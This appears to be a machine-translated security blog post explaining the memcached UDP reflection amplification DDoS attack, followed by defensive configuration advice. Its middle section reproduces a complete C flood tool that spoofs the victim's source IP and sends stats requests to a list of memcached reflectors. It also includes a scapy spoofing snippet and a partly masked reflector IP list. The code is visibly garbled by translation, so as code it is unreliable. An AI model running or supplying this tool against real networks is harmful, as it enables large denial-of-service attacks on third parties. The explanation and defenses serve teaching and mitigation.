"Vulnerability Learning" memcached Server UDP Reflection Amplification attack

1. Preface

February 28, the Memcache server was exposed to the presence of UDP reflection amplification attack vulnerability. An attacker could exploit this vulnerability to initiate a large-scale DDoS attack, which could affect the network's uptime. The vulnerability is due to the way that the Memcache server UDP protocol supports the insecure, default configuration in which UDP ports are exposed to external links.

2. Principle Analysis

The vulnerability is attacked by a distributed reflection denial of service attack by DrDoS (distributed Reflection denial of service).

• DrDoS

For the distribution and denial of service is very good understanding, the meaning of reflection is simply to borrow someone's hand to attack. Memcache can borrow Memcache's hand to attack other hosts by satisfying the borrowed condition.

• Memcached Attack principle

The attacker sends a small byte request to the Memcache server on port 11211. Because the UDP protocol does not execute correctly, the Memcache server does not respond with a similar or smaller package, but instead responds with packets that are sometimes thousands of times times larger than the original request. Because the UDP protocol, the original IP address of the packet can easily be spoofed, that is, the attacker can trick the Memcache server to send a large response packets to another IP address that is the victim of a DDoS attack IP address. This type of DDoS attack is known as "reflective DDoS" or "Reflection DDoS." The multiplier of the response packet being magnified is called the "magnification factor" of the DDoS attack.

3. Scope of Influence

• Shadon

Shadon search can get about 65,890 results.

• Zoomeye

Zoomeye found about 205,972 results

4. Basic knowledge

The idea behind all the amplification attacks is the same. The attacker uses the source IP spoofing method to send a forged request to the vulnerable UDP server. The UDP server, unaware that the request was forged, politely prepares the response. This attack problem occurs when thousands of responses are passed to an unsuspecting target host. Then we need to understand two things, one is how to access the data memcached, the second is how to forge IP.

Flip through the Internet article to find a command that uses the NC test itself for vulnerabilities. -Q1 is 1 seconds after exiting,-U is specifying the UDP protocol to send

echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

Based on the above two clues for the primer search information.

• Memcached

Most of the POC on-line is using the memcached cache system of several key commands stats, set, get command. Check out the detailed function parameters for these commands as follows:

• • Set command

The Memcached set command is used to store value (data value) in the specified key (key).

If the set key already exists, the command can update the data corresponding to the key, and implement the update function.

Grammar:

The basic syntax format for the SET command is as follows:

The parameters are described as follows:

key：键值 key-value 结构中的 key，用于查找缓存值。flags：可以包括键值对的整型参数，客户机使用它存储关于键值对的额外信息 。exptime：在缓存中保存键值对的时间长度（以秒为单位，0 表示永远）bytes：在缓存中存储的字节数noreply（可选）： 该参数告知服务器不需要返回数据value：存储的值（始终位于第二行）（可直接理解为key-value结构中的value）

Instance

In the following example we set:

• Key→runoob
• Flag→0
• exptime→900 (in seconds)
• Bytes→9 (number of bytes of data storage)
• Value→memcached

set runoob 0 900 9memcachedSTORED

get runoobVALUE runoob 0 9memcachedEND

Output

如果数据设置成功，则输出：STORED输出信息说明：    STORED：保存成功后输出。    ERROR：在保存失败后输出。

• python-Network Protocol Library scapy module

Python has a module scapy that can forge the source IP

from scapy.all import *send(IP(src=‘10.0.10.10‘,dst="www.baidu.com")/TCP(dport=80))

Tcpdump Grab bag: sudo tcpdump host 115.239.210.27 will find that the source IP has changed.

5, Code writing skills

Python version PoC

C-language version POC

/**memcached-pocmemcached Proof of Concept amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP Hosts.memcached.c-source code (Https://pastebin.com/raw/Z Iueinae) Memecache-amp-03-05-2018-rd.list-list of memcached servers as of 03-05-2018 (https://pastebin.com/raw/ ESCHTTVU) COMPILE:GCC Memcached.c-o memecached-pthread*educational and/or testing purposes only. *use of these tools against an unauthorized party May is unethtical, rude, and even illegal in some countries.**//* mem Cache reflection Script Greeting:syn, Storm, Krashed, Chrono, Spike, Niko, disliked use with extreme caution*/#includ E <time.h> #include <pthread.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h > #include <string.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/udp.h > #include <arpa/inet.h> #define max_packet_size 8192#define PHI 0x9e3779b9static uint32_t q[4096], C= 362436;struct list{struct sockaddr_in data;    struct list *next; struct list *prev;}; struct list *head;volatile int tehport;volatile int limiter;volatile unsigned int pps;volatile unsigned int sleeptime = 10 0;struct thread_data{int thread_id; struct list *list_node; struct sockaddr_in sin;};    void Init_rand (uint32_t x) {int i;    Q[0] = x;    Q[1] = x + PHI;    Q[2] = x + phi + phi;    for (i = 3; i < 4096; i++) {q[i] = q[i-3] ^ q[i-2] ^ PHI ^ i;    }}uint32_t rand_cmwc (void) {uint64_t T, a = 18782LL;    static uint32_t i = 4095;    uint32_t x, r = 0xFFFFFFFE;    i = (i + 1) & 4095;    t = A * q[i] + C;    c = (t >> 32);    x = t + C;    if (× < C) {x + +;    C + +; } return (Q[i] = r-x);}    unsigned short csum (unsigned short *buf, int nwords) {unsigned long sum = 0;    for (sum = 0; nwords > 0; nwords--) sum + = *buf++;    sum = (sum >> +) + (sum & 0xFFFF);    sum + = (sum >> 16); return (unsigned short) (~sum);}    void Setup_ip_header (struct iphdr *iph) {IPH-&GT;IHL = 5;    Iph->version = 4;    Iph->tos = 0;    Iph->tot_len = sizeof (struct IPHDR) + sizeof (struct UDPHDR) + 15;    Iph->id = htonl (54321);    Iph->frag_off = 0;    Iph->ttl = Maxttl;    Iph->protocol = IPPROTO_UDP;    Iph->check = 0; IPH-&GT;SADDR = inet_addr ("192.168.3.100");}    void Setup_udp_header (struct udphdr *udph) {Udph->source = htons (5678);    Udph->dest = htons (11211);    Udph->check = 0; memcpy (void *) UDPH + sizeof (struct UDPHDR), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15); Use the stats command to output the Memcached service information udph->len=htons (sizeof (struct UDPHDR) + 15);}    Main attack Function-thread callback function void *flood (void *par1) {struct Thread_data *td = (struct thread_data *) par1;    Char Datagram[max_packet_size];    struct IPHDR *iph = (struct IPHDR *) datagram;    struct UDPHDR *UDPH = (/*u_int8_t*/void *) iph + sizeof (struct IPHDR);    struct sockaddr_in sin = td->sin; struct List *list_node= td->list_node;    int s = socket (pf_inet, Sock_raw, ipproto_tcp);    if (s < 0) {fprintf (stderr, "Could not open raw socket.\n");    Exit (-1);    } Init_rand (Time (NULL));    memset (datagram, 0, max_packet_size);    Setup_ip_header (IPH);    Setup_udp_header (UDPH);    Udph->source = htons (rand ()% 65535-1026);    IPH-&GT;SADDR = sin.sin_addr.s_addr;    IPH-&GT;DADDR = list_node->data.sin_addr.s_addr;    Iph->check = Csum ((unsigned short *) datagram, Iph->tot_len >> 1);    int tmp = 1;    const int *val = &tmp; if (setsockopt (S, Ipproto_ip, Ip_hdrincl, Val, sizeof (TMP))) < 0) {fprintf (stderr, "error:setsockopt ()-Cannot set    Hdrincl!\n ");    Exit (-1);    } Init_rand (Time (NULL));    Register unsigned int i;    i = 0; while (1) {sendto (S, datagram, Iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof (LIST_NODE-&GT   ;d ATA));        UDP send Data List_node = list_node->next; IPH-&GT;DADDR = List_node->data.SIN_ADDR.S_ADDR;        Iph->id = htonl (RAND_CMWC () & 0xFFFFFFFF);                Iph->check = Csum ((unsigned short *) datagram, Iph->tot_len >> 1);        pps++;            if (I >= limiter) {i = 0;        Usleep (Sleeptime);    } i++;     }}int Main (int argc, char *argv[]) {//parameter less than 6, add description if (ARGC < 6) {fprintf (stderr, "Invalid parameters!\n"); fprintf (stdout, "Usage:%s <target ip> <port> <reflection file> <threads> <pps Limiter,-1        For no limit> <time>\n ", argv[0]);    Exit (-1);   } Srand (Time (NULL));    Generates a random number seed int i = 0;    head = NULL;    fprintf (stdout, "Setting up sockets...\n");    int max_len = 128;    Char *buffer = (char *) malloc (Max_len);    Buffer = memset (buffer, 0x00, Max_len);    int num_threads = atoi (argv[4]);             Number of threads int maxpps = Atoi (argv[5]);    Turn on PPS rate limiter = 0;    PPS = 0;    int multiplier = 20; FILE *list_fd = fopen (ARGV[3], "R");                Read the IP address in the file while (fgets (buffer, Max_len, list_fd)! = NULL) {if (Buffer[strlen (buffer)-1] = = ' \ n ') | | (Buffer[strlen (buffer)-1] = = ' \ r '))            {Buffer[strlen (buffer)-1] = 0x00;                if (head = = NULL) {head = (struct list *) malloc (sizeof (struct list));                Bzero (&head->data, sizeof (Head->data));     HEAD-&GT;DATA.SIN_ADDR.S_ADDR=INET_ADDR (buffer);                The vulnerability IP address is filled head->next = head;            Head->prev = head;                } else {struct list *new_node = (struct list *) malloc (sizeof (struct list));                memset (New_node, 0x00, sizeof (struct list));                NEW_NODE-&GT;DATA.SIN_ADDR.S_ADDR=INET_ADDR (buffer);                New_node->prev = head;                New_node->next = head->next;            Head->next = New_node;        } i++;        } else {continue;   } } struct List *current = head->next;    pthread_t Thread[num_threads];    struct sockaddr_in sin;    sin.sin_family = af_inet;    SIN.SIN_ADDR.S_ADDR = inet_addr (argv[1]);    The attacking host fills in the struct thread_data td[num_threads];        for (i = 0;i<num_threads;i++) {td[i].thread_id = i;         Td[i].sin= sin;                        Td[i].list_node = current;    Storage vulnerability IP pthread_create (&thread[i], NULL, &flood, (void *) &td[i]);    } fprintf (stdout, "starting flood...\n");        for (i = 0;i< (atoi (argv[6)) *multiplier), i++)//Time Control {usleep ((1000/multiplier) *1000);            if ((pps*multiplier) > Maxpps) {if (1 > Limiter) {sleeptime+=100;            } else {limiter--;            }} else {limiter++;            if (Sleeptime >) {sleeptime-=25;            } else {sleeptime = 0; }} PPS =0; } return 0;}

// memcached AMP list (Approx 17,000 hosts) DATE: 03-06-2018 - Remove this top line for use with most testing tools.85.62.36.xx112.78.10.xx202.105.247.xx121.40.71.xx101.201.199.xx129.144.63.xx61.141.124.xx103.100.209.xx113.96.195.xx47.90.76.xx83.164.193.xx74.122.193.xx120.76.207.xx120.24.69.xx129.144.61.xx105.212.115.xx130.226.11.xx179.108.253.xx203.11.105.xx

6. Defense strategy

• 1. Set access control rules

For example, running commands in a Linux environment iptables-a input-p tcp-s 192.168.0.2-dport 11211-j ACCEPT, Adding this rule to iptables only allows access to port 11211 for 192.168.0.2 this IP.

• 2 Binding Listening IP

If memcached is not open in the public network, you can specify the IP address of the binding at memcached startup at 127.0.0.1. For example, run the following command in a Linux environment:
Memcached-d-M 1024-u memcached-l 127.0.0.1-p 11211-c 1024-p/tmp/memcached.pid

• 3 Running the memcached service with minimal rights account

Run with normal privilege account, specify memcached user. For example, run the following command in a Linux environment to run memcached:
Memcached-d-M 1024-u memcached-l 127.0.0.1-p 11211-c 1024-p/tmp/memcached.pid

• 4 Enabling the authentication feature

Memcached itself does not do the authentication Access module, memcached from the 1.4.3 version, can support SASL authentication. SASL Certified Detailed Configuration Manual

• 5 Modifying the default port

Modify the default 11211 listening port to 11222 port. Run the following command in a Linux environment:
Memcached-d-M 1024-u memcached-l 127.0.0.1-p 11222-c 1024-p/tmp/memcached.pid

7. Reference

"Memcached Servers Can be abused for insanely Massive DDoS Attacks"
https://www.bleepingcomputer.com/news/security/memcache-servers-can-be-abused-for-insanely-massive-ddos-attacks/
"Memcache server can be used to launch ultra-large-scale DDoS attacks with severe impact"
https://www.anquanke.com/post/id/99241
"Memcrashed-major amplification attacks from UDP port 11211"
https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
"Memcached reflection denial of service attack technology principle"
http://blog.topsec.com.cn/ad_lab/memcached%e4%b9%8b%e5%8f%8d%e5%b0%84%e6%8b%92%e7%bb%9d%e6%9c%8d%e5%8a%a1%e6% 94%bb%e5%87%bb%e6%8a%80%e6%9c%af%e5%8e%9f%e7%90%86/?from=timeline
"Memcached-poc memcache Reflection Script"
Https://pastebin.com/raw/ZiUeinae
"Memcached set Command"
Http://www.runoob.com/memcached/memcached-set-data.html
"How to send only one UDP packet with Netcat"
Https://stackoverflow.com/questions/9696129/how-to-send-only-one-udp-packet-with-netcat

"Vulnerability Learning" memcached Server UDP Reflection Amplification attack